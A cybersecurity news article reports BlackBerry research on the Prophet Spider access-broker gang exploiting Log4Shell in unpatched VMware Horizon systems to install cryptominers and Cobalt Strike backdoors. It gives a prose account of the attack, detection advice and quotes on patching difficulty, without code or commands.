The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems. Credit: Thinkstock A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.In a blog published Wednesday, Blackberry’ researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers. One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:WindowsTemp7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group. Prophet Spider foothold suggests an uptick in exploitsBlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will perform tasks such as steal data, move through the system laterally, or infect it with ransomware. “If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds. Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the Blackberry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.'”Many VMware implementations remain unpatchedIn their blog post, the Blackberry researchers noted that the exact number of applications—and their various versions—affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation. “It’s difficult for many organizations to scan and patch all their digital assets, even just the external facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them. And if you can’t scan them, then you can’t have an effective vulnerability management program.” Related content news analysis Cisco fixes vulnerabilities in Integrated Management Controller Cisco fixes high-risk flaws in the out-of-band management controller of multiple products By Lucian Constantin Apr 18, 2024 4 mins Threat and Vulnerability Management Vulnerabilities news UK law enforcement busts online phishing marketplace The coordinated takedown has infiltrated the fraud service and made several arrests based on data found on the platform. By Shweta Sharma Apr 18, 2024 4 mins Phishing Legal news Consolidation blamed for Change Healthcare ransomware attack United HealthGroup said it has already taken $872 million in dealing with the attack and the disruption it caused. By John Leyden Apr 18, 2024 5 mins Ransomware Cyberattacks news Cisco announces AI-powered Hypershield for autonomous exploit patching in the cloud AI-based capability is part of Cisco’s Security Cloud platform for hyperscalers. By John Dunn Apr 18, 2024 4 mins Threat and Vulnerability Management Cloud Security PODCASTS VIDEOS RESOURCES EVENTS SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe